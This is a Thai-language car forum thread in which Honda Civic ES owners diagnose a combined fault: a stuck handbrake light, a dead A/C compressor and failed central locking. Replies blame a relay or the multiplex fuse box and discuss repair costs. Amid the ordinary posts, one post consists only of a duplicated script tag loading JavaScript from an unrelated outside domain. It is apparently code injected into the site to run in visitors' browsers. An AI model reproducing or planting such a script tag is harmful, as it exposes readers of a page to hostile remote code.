ตอบ
Ton-

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 24 พฤศจิกา 2008 10:20 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อ
เป็นตั้งแต่ตอนเปิดประตูเลยครับ เซ็นทรัลล็อกไม่ทำงาน พอบิดกุญแจไปที่ II ไฟเบรกมือโชว์ เช็คแล้วน้ำมันยังเต็ม แต่ที่ห้องเครื่องพัดลมทำงานเฉยเลยครับทั้งที่ยังไม่ได้สตาร์ทเครื่องหรือเปิดแอร์เลย พอสตาร์ทแล้วอาการก็ยังอยู่ คือไฟเบรกมือโชว์ เปิดแอร์แล้วไม่มีความเย็น เซ็นทรัลล็อกไม่ทำงาน นอกนั้นปกติ
ขับไปซักพักก็หาย แต่บางทีก็ไม่หาย เป็นๆ หายๆครับ

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 27 พฤศจิกา 2008 15:02, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: qq  nu_es_05 
oat_28

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2690

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 772
ให้คำขอบคุณ: 30

ปี: 2002
จันทร์, 24 พฤศจิกา 2008 10:57 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ไฟเบรกใดชว์ ใช้ไฟabs หรือเปล่าคับ ถ้าใช่แสดงว่า abs มีปัญหาคับ
Ton-

ครอบครัว ES
ครอบครัว ES

จันทร์, 24 พฤศจิกา 2008 11:43 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
โทษทีครับ ไฟเบรกมือครับ
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 24 พฤศจิกา 2008 14:21 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
รวนแบบนี้ ระบบไฟรึป่าว
kaisuh

ชื่อเล่น: ปอปลา

เข้าร่วม: 17 ตุลา 2008
ตอบ: 2822

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1703
ให้คำขอบคุณ: 8904

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 24 พฤศจิกา 2008 15:07 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
วิ่งไปที่อู่เลยครับ
oat_28

ตอบ: 2690

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 772
ให้คำขอบคุณ: 30

จันทร์, 24 พฤศจิกา 2008 16:48 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ลองใช้กล่องใชคโค้ต Error ดูคับ ว่าเป็นที่อะไร

แต่ผมไม่แน่นใจว่าพวกเซ็นทรันล็อคเช็คได้มั้ย
ได้รับคำขอบคุณจาก: qq  tonmojisung 
Balck dimension

ผู้มาเยือน

พฤหัส, 27 พฤศจิกา 2008 14:09 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ฟันธงเลยครับ กล่อง multiplex ราคารวมค่าแรงประมาณ 7000 กว่าๆ
Ton-

ครอบครัว ES
ครอบครัว ES

พฤหัส, 27 พฤศจิกา 2008 14:13 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
Balck dimension พิมพ์ว่า:
ฟันธงเลยครับ กล่อง multiplex ราคารวมค่าแรงประมาณ 7000 กว่าๆ

อย่าทำให้ตกใจสิครับ ถามช่าง ช่างบอกเป็นที่ relay ตัวเดียว 4ร้อยกว่าบาท เสียกันหลายคัน

เย็นนี้จะไปเปลี่ยนแล้ว ถ้าเป็น 7000 จริงๆ นี่เศร้าเลยนะ

ผู้มาเยือน

พฤหัส, 27 พฤศจิกา 2008 16:36 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ผมก็เป็นเหมือนคุณเลยครับ civic 2002 เช็ดใน manual แล้วเอาไปที่อู่ honda ตอนนี้กำลังสั่งกล่องตัวนี้มาเปลี่ยนครับ ได้รถพรุ่งนี้ ถ้าคุณเปลี่ยน relay แล้วหาย ช่วยแจ้งด้วยนะครับว่าเปลี่ยนที่ไหน แล้วก็เปลี่ยน relay ตัวไหน ขอบคุณมากนะครับ

ผู้มาเยือน

พฤหัส, 27 พฤศจิกา 2008 16:40 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
http://hondacrvclub.com/2008/viewtopic.php?f=1&t=10682&start=0&st=0&sk=t&sd=a

นี่เป็นของคนที่ขับ CRV ครับ ผมก็เพิ่งไปอ่านเจอมา
Ton-

ครอบครัว ES
ครอบครัว ES

พฤหัส, 27 พฤศจิกา 2008 16:58 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ได้ของวันพรุ่งนี้ครับ คงเอาไปเปลี่ยนวันเสาร์ ถ้างานเข้า 7000 นี่เซ็งสุดๆๆเลยหล่ะครับ

แต่ช่างผมค่อนข้างมั่นใจมากครับบอกเปลี่ยนมาหลายคันแล้ว เป็นช่างข้างนอกครับ

ไอ้ที่ไม่ติดอีกอย่างที่พึ่งเจอคือ ปัดน้ำฝนออโต้ไม่ติด ต้องปัดแมนวล (ดันขึ้น)

ผู้มาเยือน

พฤหัส, 27 พฤศจิกา 2008 17:02 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
เหมือนเป๊ะเลยครับ แต่ยังไงก็แล้วแต่ ถ้าเปลี่ยนแค่รีเลย์แล้วหายช่วยแจ้งด้วยนะครับว่าเปลี่ยนที่ไหนแล้วก็ relay ที่เปลี่ยนนี่ตัวไหน
nvidia

เข้าร่วม: 06 พฤศจิกา 2008
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 4
ให้คำขอบคุณ: 0

ปี: 2004
ศุกร์, 28 พฤศจิกา 2008 22:11 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ของ ผม es 04 อาการ ประมาณ นั้น เปลี่ยน แค่ delay ครับ หาย

อาการ คือ ไฟ เบรกมือ ติด ติด ดับ ดับ ถ้า ไฟเบรกมือ ติด แอร์ จามีแต่ พัด ลม ไม่เย็น

แต่ถ้าไฟเบรก มือ ดับ จะเย็นครับ

ลองดู ถ้า ไฟเบรก มือ ติดตอนวิ่ง ลอง เปิด ไฟ หน้า ดู ครับ ว่า หาย หรือเปล่า

ถ้าหาย ก็ อาการ เดียวกัน เปลี่ยน แค่ delay ประมาณ 500+ ครับ

เพิ่ง เปลี่ยนมา อิอิ delay ระเบิด อ่า ไม่รู้เป็น เพราะ อาไร อ่า

ผู้มาเยือน

จันทร์, 1 ธันวา 2008 08:38 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
รีเลย์ในห้องเครื่องหรือในห้องโดยสารครับ แล้วก็ตัวไหนหง่ะ
Ton-

ครอบครัว ES
ครอบครัว ES

จันทร์, 1 ธันวา 2008 08:47 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
relay ตัวนี้อยู่ด้านคนนั่ง ใต้เก๊ะ ครับ ถ้าเป็น multiplex จะอยู่ใต้คนขับ

แต่สรุปผมยังไม่ได้เปลี่ยนเลย เพราะอาการมันหายไป 3 วันแล้วครับ ช่างบอกกลัวเสียตังฟรี เพราะเปลี่ยนตอนนี้ก็ไม่รู้ว่ามันหายจริงรึเปล่า รอให้มันเจ๊งจริงๆ ก่อนค่อยเข้าไปใหม่

แต่ผมก็ไป 0 มา ครับ ช่างยังไม่ได้ตรวจอะไรเลยก็บอกว่าเป็น multiplex เสียแล้ว คิวมันยาวอ่ะครับ กว่าจะได้ทดสอบ เลยออกมาก่อน

ของผมมีอาการหลังจากไปเปลี่ยนท่อมาได้วันเดียว ตอนเชื่อมเค้าก็ถอดขั้วแบตออกนะครับ แต่หลังจากนั้นวันเดียวก็เกิดอาการเลย

ช่างผมบอกว่าให้ถอดแบตค้างไว้หนึ่งคืนเพื่อรีเซ้ท ecu ก่อนเผื่อมันค้าง (แต่ผมก็ไม่ค่อยเชื่อว่ามาจากสาเหตนี้เท่าไร)

รอต่อไปครับ
ได้รับคำขอบคุณจาก: battery3k 

ผู้มาเยือน

จันทร์, 1 ธันวา 2008 08:52 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ผมเปลี่ยนไปแล้วครับ ตัวเบาเลย 7600 บาท ถ้าเป็นที่รีเลย์ตัวที่ว่านี่เซ็งเลยครับ แต่เปลี่ยนแล้วอาการก็หายไปแล้วครับ
Start17

ชื่อเล่น: สตาร์ท

เข้าร่วม: 26 มีนา 2009
ตอบ: 273

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 279
ให้คำขอบคุณ: 360

สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 3 พฤษภาคม 2010 11:30 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
อาการเดียวกันเป๊ะเรยครับ

ไฟเบรกมือค้าง แอร์ไม่เย็น เซนทรัลล็อกไม่ทำงาน ใบปัดน้ำฝนระดับ1ไม่ทำงาน ไฟเตือนประตูเปิด ก้อไม่ทำงาน

ช่างที่ 0 ศรีอยุธยา แจ้งว่าให้เปลี่ยน กล่องฟิว เพราะว่ามันไหม้+ช๊อต

มาเจอกระทู้นี้ เลยคิดว่าใช่แน่

แจ้งเปลี่ยนไปแร้วครับ 7600 บาท

รอดูว่าพรุ่งนี้ อาการจะหายหรือป่าว

ขอให้หายทีเถ๊อะ สาธุๆ
ได้รับคำขอบคุณจาก: tonmojisung 
superfiat

เข้าร่วม: 07 ตุลา 2008
ตอบ: 176

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 78

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 4 กรกฎา 2010 09:51 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ในกรณีที่เกิดอาการเหล่านี้ พร้อมๆกัน โดยที่ไม่มีอาการรวนมาก่อนเลย คือ
1 ไฟเบรกมือค้าง(ผ้าไม่หมด น้ำมันเบรคไม่พร่อง)
2 แอร์ไม่เย็น (เปิดแอร์ได้ แต่มีแต่ลม คอมฯไม่ทำงาน)
3 เซนทรัลล็อกไม่ทำงาน(ใช้วิธีกดด้วยมือ)
4 ปัดน้ำฝนระดับ1 (แบบหน่วงเวลา)ไม่ทำงาน
5 ไฟเตือนประตูเปิด ไม่ทำงาน
โอกาสที่จะเกิดจาก กล่องมัลติเพล็กซ์ (กล่องฟิวส์ใต้คอพวงมาลัย)มีปัญหานั้น สูงมาก
การตรวจเช็คที่ทำได้ง่ายๆ คือ สับเปลี่ยนกล่องจากรถที่ใช้ระบบเกียร์เหมือนกัน(เกียร์ธรรมดาหรือออโต้)
พร้อมๆกับ ค่อยๆ สับรีเลย์ไปด้วย เพื่อให้แน่ใจว่า วงจรข้างในหรือรีเลย์กันแน่ที่เสีย

กล่องมัลติเพล็กซ์ เปรียบเสมือนกล่องที่คอยบริหารจัดการ การจ่ายไฟไปยังระบบต่างๆ ให้สมดุลระหว่างใช้งาน
เช่น ระบบเกียร์ออโต้ ถ้าเราไม่เข้าเกียร์ N หรือ P ก็จะทำการตัดกระแสไฟ ไม่ให้ไปยังระบบสตาร์ทได้
(นี่คือ หนึ่งความต่างของกล่องในรถเกียร์ธรรมดากับออโต้)

การซ่อมถ้าจะซ่อมจริงๆ ต้องส่งกล่องไปให้ช่างที่มีความเชี่ยวชาญเรื่องอิเล็กทรอนิกส์ ตรวจดู
ภายในกล่องจะมีแผงวงจร ซึ่งมีตัวความต้านทานมากมาย หลายตัวเป็นของที่ผลิตขึ้นเฉพาะของฮอนด้า ไม่มีขายในท้องตลาด
ถ้าเสียก้อคงต้องเปลี่ยนทั้งกล่อง ไม่มีทางเลือก นอกจากจะสนิทกับโรงงานผลิตหรือช่างเก่งขั้นเทพ

ในกรณีเปลี่ยน..มีทั้งแบบเบิกใหม่ หรือ ของเก่าเชียงกง
ถ้าซื้อของเก่า ควรดูที่กล่องไม่มีรอยเปิด บรรดาขาเสียบแจ็คไม่มีคราบขี้เกลือ ไม่มีร่องรอยการโดนน้ำมา และควรจะตกลงกันก่อนว่า
ถ้าใส่แล้วยังมีปัญหาใด ข้อใดข้อหนึ่ง ต้องเปลี่ยนได้หรือคืนเงิน

ถามว่าเสี่ยงมั้ย..สำหรับของมือสอง
ตอบเลยว่า..เสี่ยงครับ เพราะมันเป็นอุปกรณ์ที่มีการเสื่อมสภาพอยู่แล้ว และอาจเสื่อมมากขึ้น หากรถคันนั้นมีการโมดิฟายระบบไฟมาแบบผิดๆด้วย
เพียงแต่..มันก็เป็นอุปกรณ์ที่เสียยากอยู่นะครับ ไม่ค่อยมีใครเสียกัน คนดวงดี เท่านั้นครับที่เจอ..อิอิ

อ้อ..เกือบลืม กล่องมัลติเพล็กซ์นี้ ไม่ควรข้ามรุ่นระหว่างเกียร์ธรรมดากับเกียร์ออโต้นะครับ
ถึงช่างจะบอกว่า ปรับแก้ได้ก็ตามครับ

ด้วยความปราถนาดีจาก..คนดวงดี
ได้รับคำขอบคุณจาก: zan  be_z  battery3k  @hanaga@  tokykung  Noom_686  cisco  khing_cr  Guide6351  peak  Tom-Acc  jatesada  kinikuman  ae  alit  pandaman  nu_es_05  hacker  qq  tonmojisung 
Ton-

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 4 กรกฎา 2010 09:56 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ของผมมันหายไปเองครับเกือบ 2 ปีผ่านไปแล้ว ก็ยังโอเคอยู่
ได้รับคำขอบคุณจาก: battery3k 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

อาทิตย์, 4 กรกฎา 2010 12:23 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
....

แก้ไขล่าสุดโดย เมื่อ พุธ, 1 ตุลา 2014 07:53, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
@hanaga@

ตอบ: 360

ได้รับคำขอบคุณ: 493
ให้คำขอบคุณ: 132

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 4 กรกฎา 2010 23:48 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
superfiat พิมพ์ว่า:
ในกรณีที่เกิดอาการเหล่านี้ พร้อมๆกัน โดยที่ไม่มีอาการรวนมาก่อนเลย คือ
1 ไฟเบรกมือค้าง(ผ้าไม่หมด น้ำมันเบรคไม่พร่อง)
2 แอร์ไม่เย็น (เปิดแอร์ได้ แต่มีแต่ลม คอมฯไม่ทำงาน)
3 เซนทรัลล็อกไม่ทำงาน(ใช้วิธีกดด้วยมือ)
4 ปัดน้ำฝนระดับ1 (แบบหน่วงเวลา)ไม่ทำงาน
โอกาสที่จะเกิดจาก กล่องมัลติเพล็กซ์ (กล่องฟิวส์ใต้คอพวงมาลัย)มีปัญหานั้น สูงมาก
การตรวจเช็คที่ทำได้ง่ายๆ คือ สับเปลี่ยนกล่องจากรถที่ใช้ระบบเกียร์เหมือนกัน(เกียร์ธรรมดาหรือออโต้)
พร้อมๆกับ ค่อยๆ สับรีเลย์ไปด้วย เพื่อให้แน่ใจว่า วงจรข้างในหรือรีเลย์กันแน่ที่เสีย

ขออนุญาติดันนกระทู้ เพื่อคนอื่นที่มีอาการมาเห็นครับผม

กล่องมัลติเพล็กซ์ เปรียบเสมือนกล่องที่คอยบริหารจัดการ การจ่ายไฟไปยังระบบต่างๆ ให้สมดุลระหว่างใช้งาน
เช่น ระบบเกียร์ออโต้ ถ้าเราไม่เข้าเกียร์ N หรือ P ก็จะทำการตัดกระแสไฟ ไม่ให้ไปยังระบบสตาร์ทได้
(นี่คือ หนึ่งความต่างของกล่องในรถเกียร์ธรรมดากับออโต้)

การซ่อมถ้าจะซ่อมจริงๆ ต้องส่งกล่องไปให้ช่างที่มีความเชี่ยวชาญเรื่องอิเล็กทรอนิกส์ ตรวจดู
ภายในกล่องจะมีแผงวงจร ซึ่งมีตัวความต้านทานมากมาย หลายตัวเป็นของที่ผลิตขึ้นเฉพาะของฮอนด้า ไม่มีขายในท้องตลาด
ถ้าเสียก้อคงต้องเปลี่ยนทั้งกล่อง ไม่มีทางเลือก นอกจากจะสนิทกับโรงงานผลิตหรือช่างเก่งขั้นเทพ

ในกรณีเปลี่ยน..มีทั้งแบบเบิกใหม่ หรือ ของเก่าเชียงกง
ถ้าซื้อของเก่า ควรดูที่กล่องไม่มีรอยเปิด บรรดาขาเสียบแจ็คไม่มีคราบขี้เกลือ ไม่มีร่องรอยการโดนน้ำมา และควรจะตกลงกันก่อนว่า
ถ้าใส่แล้วยังมีปัญหาใด ข้อใดข้อหนึ่ง ต้องเปลี่ยนได้หรือคืนเงิน

ถามว่าเสี่ยงมั้ย..สำหรับของมือสอง
ตอบเลยว่า..เสี่ยงครับ เพราะมันเป็นอุปกรณ์ที่มีการเสื่อมสภาพอยู่แล้ว และอาจเสื่อมมากขึ้น หากรถคันนั้นมีการโมดิฟายระบบไฟมาแบบผิดๆด้วย
เพียงแต่..มันก็เป็นอุปกรณ์ที่เสียยากอยู่นะครับ ไม่ค่อยมีใครเสียกัน คนดวงดี เท่านั้นครับที่เจอ..อิอิ

อ้อ..เกือบลืม กล่องมัลติเพล็กซ์นี้ ไม่ควรข้ามรุ่นระหว่างเกียร์ธรรมดากับเกียร์ออโต้นะครับ
ถึงช่างจะบอกว่า ปรับแก้ได้ก็ตามครับ

ได้รับคำขอบคุณจาก: wighwaytak 
ton1421

ตอบ: 141

ได้รับคำขอบคุณ: 169
ให้คำขอบคุณ: 8

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 3 สิงหา 2010 15:51 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
อาการเดียวกันเป่ะ เพิ่มไฟคาดเบลท์อีกคัวครับ ถ้าเป็น อาการมันคือใส่ไม่ใส่ ไฟก็ไม่ติดเตือน

ตอนนี้รอดูอาการอยู่ครับ เพิ่งเป็นครั้งเดียวเมื่อเช้า
nokmodify

ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 3 สิงหา 2010 17:08 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
หายไวๆๆจร้า
ton1421

พุธ, 11 สิงหา 2010 11:48 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
ton1421 พิมพ์ว่า:
อาการเดียวกันเป่ะ เพิ่มไฟคาดเบลท์อีกคัวครับ ถ้าเป็น อาการมันคือใส่ไม่ใส่ ไฟก็ไม่ติดเตือน

ตอนนี้รอดูอาการอยู่ครับ เพิ่งเป็นครั้งเดียวเมื่อเช้า

จากวันนั้นที่เป็น ถึงตอนนี้ เป็นครั้งนั้นครั้งเดียวครับ

ขับไปเสียวไป แต่จะเปลี่ยนกล่องเลย ก็เสียดายเงินอยู่ 7พันปลายแน่ะ

กระทู้ดีมากเลยครับ นึกว่าแอร์พัง central lock พังพร้อมกันซะอีก
okuma

ชื่อเล่น: ตู่

เข้าร่วม: 16 กรกฎา 2010
ตอบ: 1962

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1131
ให้คำขอบคุณ: 5404

พุธ, 11 สิงหา 2010 17:42 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
Luxky

เข้าร่วม: 20 กรกฎา 2010
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 0

พุธ, 11 สิงหา 2010 21:34 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
เป็นเหมือนกันครับ...รถแฟนเพิ่งเป็นเมื่อวันก่อนเอง...
ตอนนี้อู่กะลังไล่ให้อยู่ครับ...ว่ามันเกิดจากอาไร
เซงเลย
ton1421

พฤหัส, 12 สิงหา 2010 21:00 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน

จากวันนั้นที่เป็น ถึงตอนนี้ เป็นครั้งนั้นครั้งเดียวครับ

ขับไปเสียวไป แต่จะเปลี่ยนกล่องเลย ก็เสียดายเงินอยู่ 7พันปลายแน่ะ

กระทู้ดีมากเลยครับ นึกว่าแอร์พัง central lock พังพร้อมกันซะอีก

รายงานครับ
เรียบร้อยแล้ว วันนี้กลับมาเป็นอาการเดิมเป่ะ เช้าไปรพ. ยังโอเค ขากลับ ขับยาวๆ ไม่หายครับ
หัวค่ำมาลองเช็คอีกที ไม่รอด ไฟเบครค้างตลอด แอร์ไม่ทำงาน ตัวแจ้ง belt ไม่ทำงาน ปัดน้ำฝนเบอร์ 2 ไม่ทำงาน

พรุ่งนี้จะไปหาเฮียก่ำ ถ้าไม่จบว่าจะสั่งกล่องที่ 0 ล่ะครับ
khing_cr

ชื่อเล่น: ขิง

ตอบ: 567

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1258
ให้คำขอบคุณ: 1979

ปี: 2004
พฤหัส, 12 สิงหา 2010 21:12 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
superfiat พิมพ์ว่า:

คนดวงดีได้ใช้กล่อง แจแปน เชียวนะ อิ อิ เหอๆๆ
Ton-

ครอบครัว ES
ครอบครัว ES

เสาร์, 14 สิงหา 2010 07:54 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน

รายงานครับ
เรียบร้อยแล้ว วันนี้กลับมาเป็นอาการเดิมเป่ะ เช้าไปรพ. ยังโอเค ขากลับ ขับยาวๆ ไม่หายครับ
หัวค่ำมาลองเช็คอีกที ไม่รอด ไฟเบครค้างตลอด แอร์ไม่ทำงาน ตัวแจ้ง belt ไม่ทำงาน ปัดน้ำฝนเบอร์ 2 ไม่ทำงาน

พรุ่งนี้จะไปหาเฮียก่ำ ถ้าไม่จบว่าจะสั่งกล่องที่ 0 ล่ะครับ

ถ้าสั่งกล่องใหม่แนะนำหากล่องมือสองญี่ปุ่นก็พอครับ ไม่กี่พัน ลองติดต่อคุณ เต้ es94 ดูครับ น่าจะมี
ton1421

เสาร์, 14 สิงหา 2010 08:31 - มีปัญหาเกี่ยวกับรถ ไฟเบรกมือค้าง คอมแอร์ไม่ทำงาน เซ็นทรัลล็อกไม่ทำงาน
55555 ไป autoway แล้วครับ เปลี่ยนกล่องใหม่จากบางปะกง ก็หนักกว่าเดิม start ไม่ติด สงสัยใส่กล่องผิดเบอร์
แต่ตอนนี้ ทุกอย่างกลับมาปกติอีกแล้ว แต่ยังไงก็คงเปลี่ยนล่ะครับ นัดไว้เย็นนี้ไปเปลี่นยอีกที
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.